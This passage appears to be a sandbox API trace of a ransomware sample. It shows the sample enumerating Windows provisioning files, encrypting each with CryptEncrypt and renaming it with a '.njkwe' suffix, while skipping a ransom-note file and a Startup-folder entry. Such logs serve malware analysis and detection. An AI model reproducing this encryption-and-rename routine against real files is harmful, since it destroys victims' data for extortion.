(lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\231__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.479] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\231__Connections_Cellular_KTF HSDPA Internet (Korea)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\231__connections_cellular_ktf hsdpa internet (korea)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.479] GetTickCount () returned 0x1153b40 [0077.479] GetTickCount () returned 0x1153b40 [0077.479] GetTickCount () returned 0x1153b40 [0077.480] GetTickCount () returned 0x1153b40 [0077.480] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.480] GetProcessHeap () returned 0xbe0000 [0077.480] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.480] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x29e, lpOverlapped=0x0) returned 1 [0077.485] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd62, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.485] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x29e, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x29e, lpOverlapped=0x0) returned 1 [0077.485] GetProcessHeap () returned 0xbe0000 [0077.485] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.485] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.485] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.485] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.485] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.485] CloseHandle (hObject=0x43c) returned 1 [0077.485] GetProcessHeap () returned 0xbe0000 [0077.485] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.485] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\231__Connections_Cellular_KTF HSDPA Internet (Korea)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 190 [0077.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\231__Connections_Cellular_KTF HSDPA Internet (Korea)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\231__connections_cellular_ktf hsdpa internet (korea)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\231__Connections_Cellular_KTF HSDPA Internet (Korea)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\231__connections_cellular_ktf hsdpa internet (korea)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.486] GetProcessHeap () returned 0xbe0000 [0077.486] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.486] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9088a4b2, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9088a4b2, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9088a4b2, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="232__Connections_Cellular_Wataniya (Kuwait)_i0$(__MVID)@WAP.provxml", cAlternateFileName="232__C~1.PRO")) returned 1 [0077.486] lstrcmpiW (lpString1="232__Connections_Cellular_Wataniya (Kuwait)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.486] lstrcmpiW (lpString1="232__Connections_Cellular_Wataniya (Kuwait)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.486] lstrcmpiW (lpString1="232__Connections_Cellular_Wataniya (Kuwait)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.486] lstrcmpiW (lpString1="232__Connections_Cellular_Wataniya (Kuwait)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.486] lstrcmpiW (lpString1="232__Connections_Cellular_Wataniya (Kuwait)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.486] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\232__Connections_Cellular_Wataniya (Kuwait)_i0$(__MVID)@WAP.provxml") returned 161 [0077.486] StrStrIW (lpFirst="232__Connections_Cellular_Wataniya (Kuwait)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.486] lstrcmpW (lpString1="232__Connections_Cellular_Wataniya (Kuwait)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.486] lstrcmpW (lpString1="232__Connections_Cellular_Wataniya (Kuwait)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.487] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\232__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.487] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\232__Connections_Cellular_Wataniya (Kuwait)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\232__connections_cellular_wataniya (kuwait)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.487] GetTickCount () returned 0x1153b50 [0077.487] GetTickCount () returned 0x1153b50 [0077.487] GetTickCount () returned 0x1153b50 [0077.487] GetTickCount () returned 0x1153b50 [0077.487] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.488] GetProcessHeap () returned 0xbe0000 [0077.488] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.488] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x28e, lpOverlapped=0x0) returned 1 [0077.489] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.489] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x28e, lpOverlapped=0x0) returned 1 [0077.489] GetProcessHeap () returned 0xbe0000 [0077.489] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.489] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.489] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.489] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.489] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.489] CloseHandle (hObject=0x43c) returned 1 [0077.490] GetProcessHeap () returned 0xbe0000 [0077.490] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.490] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\232__Connections_Cellular_Wataniya (Kuwait)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0077.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\232__Connections_Cellular_Wataniya (Kuwait)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\232__connections_cellular_wataniya (kuwait)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\232__Connections_Cellular_Wataniya (Kuwait)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\232__connections_cellular_wataniya (kuwait)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.490] GetProcessHeap () returned 0xbe0000 [0077.490] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.490] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9088a4b2, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9088a4b2, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9088a4b2, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2bc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="233__Connections_Cellular_Zain (Kuwait)_i0$(__MVID)@WAP.provxml", cAlternateFileName="233__C~1.PRO")) returned 1 [0077.490] lstrcmpiW (lpString1="233__Connections_Cellular_Zain (Kuwait)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.490] lstrcmpiW (lpString1="233__Connections_Cellular_Zain (Kuwait)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.490] lstrcmpiW (lpString1="233__Connections_Cellular_Zain (Kuwait)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.490] lstrcmpiW (lpString1="233__Connections_Cellular_Zain (Kuwait)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.490] lstrcmpiW (lpString1="233__Connections_Cellular_Zain (Kuwait)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.490] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\233__Connections_Cellular_Zain (Kuwait)_i0$(__MVID)@WAP.provxml") returned 157 [0077.490] StrStrIW (lpFirst="233__Connections_Cellular_Zain (Kuwait)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.490] lstrcmpW (lpString1="233__Connections_Cellular_Zain (Kuwait)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.490] lstrcmpW (lpString1="233__Connections_Cellular_Zain (Kuwait)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.490] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\233__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.491] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\233__Connections_Cellular_Zain (Kuwait)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\233__connections_cellular_zain (kuwait)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.491] GetTickCount () returned 0x1153b50 [0077.491] GetTickCount () returned 0x1153b50 [0077.491] GetTickCount () returned 0x1153b50 [0077.491] GetTickCount () returned 0x1153b50 [0077.491] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.491] GetProcessHeap () returned 0xbe0000 [0077.491] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.491] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2bc, lpOverlapped=0x0) returned 1 [0077.497] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.497] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2bc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2bc, lpOverlapped=0x0) returned 1 [0077.497] GetProcessHeap () returned 0xbe0000 [0077.497] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.497] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.497] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.497] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.498] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.498] CloseHandle (hObject=0x43c) returned 1 [0077.498] GetProcessHeap () returned 0xbe0000 [0077.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.498] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\233__Connections_Cellular_Zain (Kuwait)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 177 [0077.498] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\233__Connections_Cellular_Zain (Kuwait)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\233__connections_cellular_zain (kuwait)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\233__Connections_Cellular_Zain (Kuwait)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\233__connections_cellular_zain (kuwait)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.498] GetProcessHeap () returned 0xbe0000 [0077.498] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.498] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9088a4b2, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9088a4b2, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9088a4b2, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2ca, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="234__Connections_Cellular_Bite Latvija (Latvia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="234__C~1.PRO")) returned 1 [0077.498] lstrcmpiW (lpString1="234__Connections_Cellular_Bite Latvija (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.498] lstrcmpiW (lpString1="234__Connections_Cellular_Bite Latvija (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.498] lstrcmpiW (lpString1="234__Connections_Cellular_Bite Latvija (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.499] lstrcmpiW (lpString1="234__Connections_Cellular_Bite Latvija (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.499] lstrcmpiW (lpString1="234__Connections_Cellular_Bite Latvija (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.499] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\234__Connections_Cellular_Bite Latvija (Latvia)_i0$(__MVID)@WAP.provxml") returned 165 [0077.499] StrStrIW (lpFirst="234__Connections_Cellular_Bite Latvija (Latvia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.499] lstrcmpW (lpString1="234__Connections_Cellular_Bite Latvija (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.499] lstrcmpW (lpString1="234__Connections_Cellular_Bite Latvija (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.499] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\234__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.499] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\234__Connections_Cellular_Bite Latvija (Latvia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\234__connections_cellular_bite latvija (latvia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.499] GetTickCount () returned 0x1153b5f [0077.499] GetTickCount () returned 0x1153b5f [0077.499] GetTickCount () returned 0x1153b5f [0077.499] GetTickCount () returned 0x1153b5f [0077.499] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.500] GetProcessHeap () returned 0xbe0000 [0077.500] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.500] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2ca, lpOverlapped=0x0) returned 1 [0077.501] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd36, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.501] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2ca, lpOverlapped=0x0) returned 1 [0077.501] GetProcessHeap () returned 0xbe0000 [0077.501] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.501] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.501] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.502] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.502] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.502] CloseHandle (hObject=0x43c) returned 1 [0077.502] GetProcessHeap () returned 0xbe0000 [0077.502] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.502] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\234__Connections_Cellular_Bite Latvija (Latvia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0077.502] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\234__Connections_Cellular_Bite Latvija (Latvia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\234__connections_cellular_bite latvija (latvia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\234__Connections_Cellular_Bite Latvija (Latvia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\234__connections_cellular_bite latvija (latvia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.503] GetProcessHeap () returned 0xbe0000 [0077.503] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.503] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x908b0722, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x908b0722, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x908b0722, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x383, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="235__Connections_Cellular_LMT (Latvia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="235__C~1.PRO")) returned 1 [0077.503] lstrcmpiW 